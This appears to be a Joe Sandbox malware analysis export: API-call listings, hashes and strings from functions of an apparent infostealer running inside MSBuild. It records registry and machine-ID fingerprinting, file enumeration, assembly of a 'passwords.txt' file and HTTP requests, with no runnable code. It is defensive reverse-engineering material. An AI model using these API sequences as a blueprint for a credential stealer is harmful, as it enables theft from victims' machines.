                                                                                          • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: lstrlen$Internet$lstrcpy$H_prologHeap$HttpProcessmemcpy$AllocOpenRequestlstrcat$BinaryCloseConnectCrackCryptExitFileHandleInfoOptionQueryReadSendString
                                                                                          • String ID: ------$"$"$"$"$--$------$------$------$------$/$ERROR$ERROR$block$build_id$file_data
                                                                                          • API String ID: 2658035217-3274521816
                                                                                          • Opcode ID: 55ed085d277c474f36801abdb5871a2e9711e2d2595ca9f7e5e1cdb52fd56dac
                                                                                          • Instruction ID: 11be5296a5fba78ccfa74642cc821248e7657d66928f859353594ff17aad1918
                                                                                          • Opcode Fuzzy Hash: 55ed085d277c474f36801abdb5871a2e9711e2d2595ca9f7e5e1cdb52fd56dac
                                                                                          • Instruction Fuzzy Hash: 90624EB190014DEADB11EBE0C956BEEBBB8AF18308F50417EE505735C2DA786B4CCB65
                                                                                          Function 0040C27B Relevance: 42.3, APIs: 23, Strings: 1, Instructions: 296stringmemoryfileCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          • _EH_prolog.MSVCRT ref: 0040C280
                                                                                            • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                            • Part of subcall function 00410B5C: _EH_prolog.MSVCRT ref: 00410B61
                                                                                            • Part of subcall function 00410B5C: GetSystemTime.KERNEL32(?,00426440,00000001,000000C8,00000000,00426562), ref: 00410BA1
                                                                                            • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                                            • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426AC0,?,00000000,0042656F), ref: 0040FAC9
                                                                                            • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                                            • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                                            • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                                            • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                                            • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
                                                                                            • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                                          • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040C378
                                                                                          • GetProcessHeap.KERNEL32(00000000,000F423F), ref: 0040C3D9
                                                                                          • RtlAllocateHeap.NTDLL(00000000), ref: 0040C3E0
                                                                                          • lstrlenA.KERNEL32(00000000,00000000), ref: 0040C470
                                                                                          • lstrcat.KERNEL32(00000000), ref: 0040C487
                                                                                          • lstrcat.KERNEL32(00000000,00000000), ref: 0040C499
                                                                                          • lstrcat.KERNEL32(00000000,00425B50), ref: 0040C4A7
                                                                                          • lstrcat.KERNEL32(00000000,00000000), ref: 0040C4B9
                                                                                          • lstrcat.KERNEL32(00000000,00425B54), ref: 0040C4C7
                                                                                          • lstrcat.KERNEL32(00000000), ref: 0040C4D6
                                                                                          • lstrcat.KERNEL32(00000000,00000000), ref: 0040C4E8
                                                                                          • lstrcat.KERNEL32(00000000,00425B58), ref: 0040C4F6
                                                                                          • lstrcat.KERNEL32(00000000), ref: 0040C505
                                                                                          • lstrcat.KERNEL32(00000000,00000000), ref: 0040C517
                                                                                          • lstrcat.KERNEL32(00000000,00425B5C), ref: 0040C525
                                                                                          • lstrcat.KERNEL32(00000000), ref: 0040C534
                                                                                          • lstrcat.KERNEL32(00000000,00000000), ref: 0040C546
                                                                                          • lstrcat.KERNEL32(00000000,00425B60), ref: 0040C554
                                                                                          • lstrcat.KERNEL32(00000000,00425B64), ref: 0040C562
                                                                                          • lstrlenA.KERNEL32(00000000), ref: 0040C596
                                                                                          • memset.MSVCRT ref: 0040C5E9
                                                                                          • DeleteFileA.KERNEL32(00000000), ref: 0040C616
                                                                                            • Part of subcall function 004063B1: _EH_prolog.MSVCRT ref: 004063B6
                                                                                            • Part of subcall function 004063B1: memcmp.MSVCRT ref: 004063DC
                                                                                            • Part of subcall function 004063B1: memset.MSVCRT ref: 0040640B
                                                                                            • Part of subcall function 004063B1: LocalAlloc.KERNEL32(00000040,-000000E1,?,?,?,?,00000000,00000000), ref: 00406440
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.2042878342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000001.00000002.2042878342.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: lstrcat$H_prolog$lstrcpy$lstrlen$FileHeapmemset$AllocAllocateCopyDeleteLocalProcessSystemTimememcmp
                                                                                          • String ID: passwords.txt
                                                                                          • API String ID: 3298853120-347816968
                                                                                          • Opcode ID: 4b1ff610774e8c77471883ccd83e1c17f67f4a4143a384f07f00799f4a19b9b8
                                                                                          • Instruction ID: 1ecdebe3f11d8fac3e9d0efa643fe933af64b4fe52e77a22e07e9b20bef025ed
                                                                                          • Opcode Fuzzy Hash: 4b1ff610774e8c77471883ccd83e1c17f67f4a4143a384f07f00799f4a19b9b8
                                                                                          • Instruction Fuzzy Hash: 98C16971800159EEDB15EBE4ED1AEEEBB75BF18304F10403AF511721E1DB782A09DB25
                                                                                          Function 004041B2 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 170networkmemoryfileCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • _EH_prolog.MSVCRT ref: 004041B7
                                                                                            • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                                            • Part of subcall function 00403A54: _EH_prolog.MSVCRT ref: 00403A59
                                                                                            • Part of subcall function 00403A54: ??_U@YAPAXI@Z.MSVCRT ref: 00403A8B
                                                                                            • Part of subcall function 00403A54: ??_U@YAPAXI@Z.MSVCRT ref: 00403A94
                                                                                            • Part of subcall function 00403A54: ??_U@YAPAXI@Z.MSVCRT ref: 00403A9D
                                                                                            • Part of subcall function 00403A54: lstrlenA.KERNEL32(00000000,00000000,?,?,00000001,000000C8), ref: 00403AB7
                                                                                            • Part of subcall function 00403A54: InternetCrackUrlA.WININET(00000000,00000000,?,00000001), ref: 00403AC7
                                                                                          • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 004041FE
                                                                                          • RtlAllocateHeap.NTDLL(00000000), ref: 00404205
                                                                                          • InternetOpenA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00404224
                                                                                          • StrCmpCA.SHLWAPI(?), ref: 00404238
                                                                                          • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040425C
                                                                                          • HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 00404292
                                                                                          • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 004042B6
                                                                                          • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 004042C1
                                                                                          • HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 004042DF
                                                                                          • InternetReadFile.WININET(00000000,?,00000400,?), ref: 00404337
                                                                                          • InternetCloseHandle.WININET(00000000), ref: 00404369
                                                                                          • InternetCloseHandle.WININET(?), ref: 00404372
                                                                                          • InternetCloseHandle.WININET(?), ref: 0040437B
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.2042878342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000001.00000002.2042878342.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Internet$CloseHandleHttp$H_prologHeapOpenRequest$AllocateConnectCrackFileInfoOptionProcessQueryReadSendlstrcpylstrlen
                                                                                          • String ID: GET
                                                                                          • API String ID: 1687531150-1805413626
                                                                                          • Opcode ID: 5c17fe2671a6e7da2559d3110b2e5ff5de3778f8e7e7f5b7b1cd9291ace094b3
                                                                                          • Instruction ID: 7ce3078965428967d931fab95435fba2e2eaf60a30af71eeb75a30b69647e977
                                                                                          • Opcode Fuzzy Hash: 5c17fe2671a6e7da2559d3110b2e5ff5de3778f8e7e7f5b7b1cd9291ace094b3
                                                                                          • Instruction Fuzzy Hash: 07516DB2900219AFDB10EFE0CC85AEEBBB9EB49344F00513AFA01B2190D7785E45CB65
                                                                                          Function 00410071 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 178registrystringCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • _EH_prolog.MSVCRT ref: 00410076
                                                                                            • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                          • RegOpenKeyExA.KERNEL32(?,00000000,00020019,?,0042626F,00000001,00000000), ref: 004100BE
                                                                                          • RegEnumKeyExA.KERNEL32(?,?,?,?,00000000,00000000,00000000,00000000), ref: 00410108
                                                                                          • wsprintfA.USER32 ref: 00410132
                                                                                          • RegOpenKeyExA.KERNEL32(?,?,00000000,00020019,?), ref: 0041014F
                                                                                          • RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?), ref: 00410179
                                                                                          • lstrlenA.KERNEL32(?), ref: 0041018E
                                                                                          • RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?,00000000,?,?,00000000,?,00426298), ref: 0041020E
                                                                                            • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.2042878342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000001.00000002.2042878342.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: OpenQueryValuelstrcpy$EnumH_prologlstrlenwsprintf
                                                                                          • String ID: - $%s\%s$?
                                                                                          • API String ID: 404191982-3278919252
                                                                                          • Opcode ID: 063371d2b875b6717c154b92f163b7baa1dc5683eb4907d65be1d3fe8856eca0
                                                                                          • Instruction ID: e683f53884952fc8e4340679726e39bda7e6eb295b9d2e7bf921829342b6fcae
                                                                                          • Opcode Fuzzy Hash: 063371d2b875b6717c154b92f163b7baa1dc5683eb4907d65be1d3fe8856eca0
                                                                                          • Instruction Fuzzy Hash: 177113B190021DEEDF11EFE1DD84EEEBBB9BB18304F10417AE905B2151DB785A88CB64
                                                                                          Function 004104DD Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 123memorystringCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • _EH_prolog.MSVCRT ref: 004104E2
                                                                                          • GetWindowsDirectoryA.KERNEL32(?,00000104,00000001,?,00000000), ref: 00410505
                                                                                          • GetVolumeInformationA.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,?,00000000), ref: 00410537
                                                                                          • GetProcessHeap.KERNEL32(00000000,00000104,?,?,00000000), ref: 0041057A
                                                                                          • HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 00410581
                                                                                          • wsprintfA.USER32 ref: 004105AD
                                                                                          • lstrcat.KERNEL32(00000000,00426248), ref: 004105BC
                                                                                            • Part of subcall function 004104A2: GetCurrentHwProfileA.ADVAPI32(?), ref: 004104B3
                                                                                          • lstrlenA.KERNEL32(00000000), ref: 004105DB
                                                                                            • Part of subcall function 00411154: malloc.MSVCRT ref: 00411162
                                                                                            • Part of subcall function 00411154: strncpy.MSVCRT ref: 00411172
                                                                                          • lstrcat.KERNEL32(00000000,00000000), ref: 00410608
                                                                                            • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.2042878342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000001.00000002.2042878342.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Heaplstrcat$AllocCurrentDirectoryH_prologInformationProcessProfileVolumeWindowslstrcpylstrlenmallocstrncpywsprintf
                                                                                          • String ID: :\$C
                                                                                          • API String ID: 688099012-3309953409
                                                                                          • Opcode ID: 1522b66ae9d2de447abac276b6048746d7087383805eda5a4ea2a9c8c75e97bf
                                                                                          • Instruction ID: 31ba2aefab9431e017bcb41f2bdcd0be11d417c1f72aa959c07d5e8bae5074a4
                                                                                          • Opcode Fuzzy Hash: 1522b66ae9d2de447abac276b6048746d7087383805eda5a4ea2a9c8c75e97bf
                                                                                          • Instruction Fuzzy Hash: 8D418071801158ABCB11EBE5DD89EEFBBBDEF4A304F10006EF505A3141EA385A48CBB5
                                                                                          Function 00413118 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 116stringCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • _EH_prolog.MSVCRT ref: 0041311D
                                                                                            • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                            • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                                            • Part of subcall function 00404F2A: _EH_prolog.MSVCRT ref: 00404F2F
                                                                                            • Part of subcall function 00404F2A: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404F92
                                                                                            • Part of subcall function 00404F2A: StrCmpCA.SHLWAPI(?), ref: 00404FA6
                                                                                            • Part of subcall function 00404F2A: InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00404FC9
                                                                                            • Part of subcall function 00404F2A: HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 00404FFF
                                                                                            • Part of subcall function 00404F2A: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00405023
                                                                                            • Part of subcall function 00404F2A: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040502E
                                                                                            • Part of subcall function 00404F2A: HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 0040504C
                                                                                            • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                                          • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 0041319F
                                                                                          • lstrlenA.KERNEL32(00000000), ref: 004131B6
                                                                                            • Part of subcall function 00410D6D: LocalAlloc.KERNEL32(00000040,004131CC,000000C8,00000001,?,004131CB,00000000,00000000), ref: 00410D86
                                                                                          • StrStrA.SHLWAPI(00000000,00000000), ref: 004131DD
                                                                                          • lstrlenA.KERNEL32(00000000), ref: 004131F2
                                                                                          • lstrlenA.KERNEL32(00000000), ref: 0041320D
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.2042878342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000001.00000002.2042878342.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: HttpInternetlstrcpylstrlen$H_prologOpenRequest$AllocConnectInfoLocalOptionQuerySend
                                                                                          • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                                                                                          • API String ID: 3807055897-1526165396
                                                                                          • Opcode ID: 2c86652b872a1e0dadd1c653e9dcbefc8a1b1809ca84a3556183aa192fa2429b
                                                                                          • Instruction ID: 62ef994e2eebf51157d4abcec818fbc8b07954dcba3d20b807130a2a391ecf21
                                                                                          • Opcode Fuzzy Hash: 2c86652b872a1e0dadd1c653e9dcbefc8a1b1809ca84a3556183aa192fa2429b
                                                                                          • Instruction Fuzzy Hash: A341A4B1900258EACB11FFA5D956FDDB7B4AF18708F10017EF90173182DB786B48CA6A
                                                                                          Function 00410415 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 42registryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • memset.MSVCRT ref: 0041043B
                                                                                          • RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00020119,004264F6,?,?,00000000), ref: 00410457
                                                                                          • RegQueryValueExA.KERNEL32(004264F6,MachineGuid,00000000,00000000,?,000000FF,?,?,00000000), ref: 00410476
                                                                                          • RegCloseKey.ADVAPI32(004264F6,?,?,00000000), ref: 0041047F
                                                                                          • CharToOemA.USER32(?,?), ref: 00410493
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.2042878342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000001.00000002.2042878342.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CharCloseOpenQueryValuememset
                                                                                          • String ID: MachineGuid$SOFTWARE\Microsoft\Cryptography
                                                                                          • API String ID: 2391366103-1211650757
                                                                                          • Opcode ID: 690c6a79ccc41db0391f32f940e07a5d4ef8664030ade9d40bd6695f658342bb
                                                                                          • Instruction ID: 59bbf989d6e17c2dbf70e6b3d9441336261c3d0a51168b80e9bc1bfc74bcefc6
                                                                                          • Opcode Fuzzy Hash: 690c6a79ccc41db0391f32f940e07a5d4ef8664030ade9d40bd6695f658342bb
                                                                                          • Instruction Fuzzy Hash: BA014F7590421DFFEB10EB90DC8AFEABB7CEB14704F1000A5B244E2051EAB45EC88B60
                                                                                          Function 0041612D Relevance: 12.1, APIs: 8, Instructions: 109stringCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • _EH_prolog.MSVCRT ref: 00416132
                                                                                          • lstrcat.KERNEL32(?,?), ref: 00416188
                                                                                            • Part of subcall function 00410D21: SHGetFolderPathA.SHELL32(00000000,;\B,00000000,00000000,?), ref: 00410D52
                                                                                          • lstrcat.KERNEL32(?,00000000), ref: 004161AE
                                                                                          • lstrcat.KERNEL32(?,?), ref: 004161CE
                                                                                          • lstrcat.KERNEL32(?,?), ref: 004161E2
                                                                                          • lstrcat.KERNEL32(?), ref: 004161F5
                                                                                          • lstrcat.KERNEL32(?,?), ref: 00416209
                                                                                          • lstrcat.KERNEL32(?), ref: 0041621C
                                                                                            • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                            • Part of subcall function 00410CDD: _EH_prolog.MSVCRT ref: 00410CE2
                                                                                            • Part of subcall function 00410CDD: GetFileAttributesA.KERNEL32(00000000,?,0040BAC2,?,00425BF6,?,?), ref: 00410CF6
                                                                                            • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                            • Part of subcall function 00415E66: _EH_prolog.MSVCRT ref: 00415E6B
                                                                                            • Part of subcall function 00415E66: GetProcessHeap.KERNEL32(00000000,0098967F,?,00000104), ref: 00415E83
                                                                                            • Part of subcall function 00415E66: HeapAlloc.KERNEL32(00000000,?,00000104), ref: 00415E8A
                                                                                            • Part of subcall function 00415E66: wsprintfA.USER32 ref: 00415EA2
                                                                                            • Part of subcall function 00415E66: FindFirstFileA.KERNEL32(?,?), ref: 00415EB9
                                                                                            • Part of subcall function 00415E66: StrCmpCA.SHLWAPI(?,00426894), ref: 00415ED6
                                                                                            • Part of subcall function 00415E66: StrCmpCA.SHLWAPI(?,00426898), ref: 00415EF0
                                                                                            • Part of subcall function 00415E66: wsprintfA.USER32 ref: 00415F14
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.2042878342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000001.00000002.2042878342.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: lstrcat$H_prolog$FileHeapwsprintf$AllocAttributesFindFirstFolderPathProcesslstrcpy
                                                                                          • String ID:
                                                                                          • API String ID: 2058169020-0
                                                                                          • Opcode ID: 27df2bee6747110bfdf8ae1cd169a3c4ba849b41f39ec8b444c4dbb6a37d260a
                                                                                          • Instruction ID: c8bc0cfaec16e0a9c8e3cc6943dd29f550fca9c9c6472c90ce97e84fdf381955
                                                                                          • Opcode Fuzzy Hash: 27df2bee6747110bfdf8ae1cd169a3c4ba849b41f39ec8b444c4dbb6a37d260a
                                                                                          • Instruction Fuzzy Hash: A541FEB2D0022DAACF11EBE0DC49EDE77BCAF1D314F4005AAB505E3051EA78D7888B64
                                                                                          Function 0040618B Relevance: 10.6, APIs: 7, Instructions: 70filememoryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • _EH_prolog.MSVCRT ref: 00406190
                                                                                          • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 004061B3
                                                                                          • GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 004061CA
                                                                                          • LocalAlloc.KERNEL32(00000040,?,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 004061E6
                                                                                          • ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,?,?,?,00000000), ref: 00406200
                                                                                          • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 00406216
                                                                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 00406221
                                                                                          Memory Dump Source
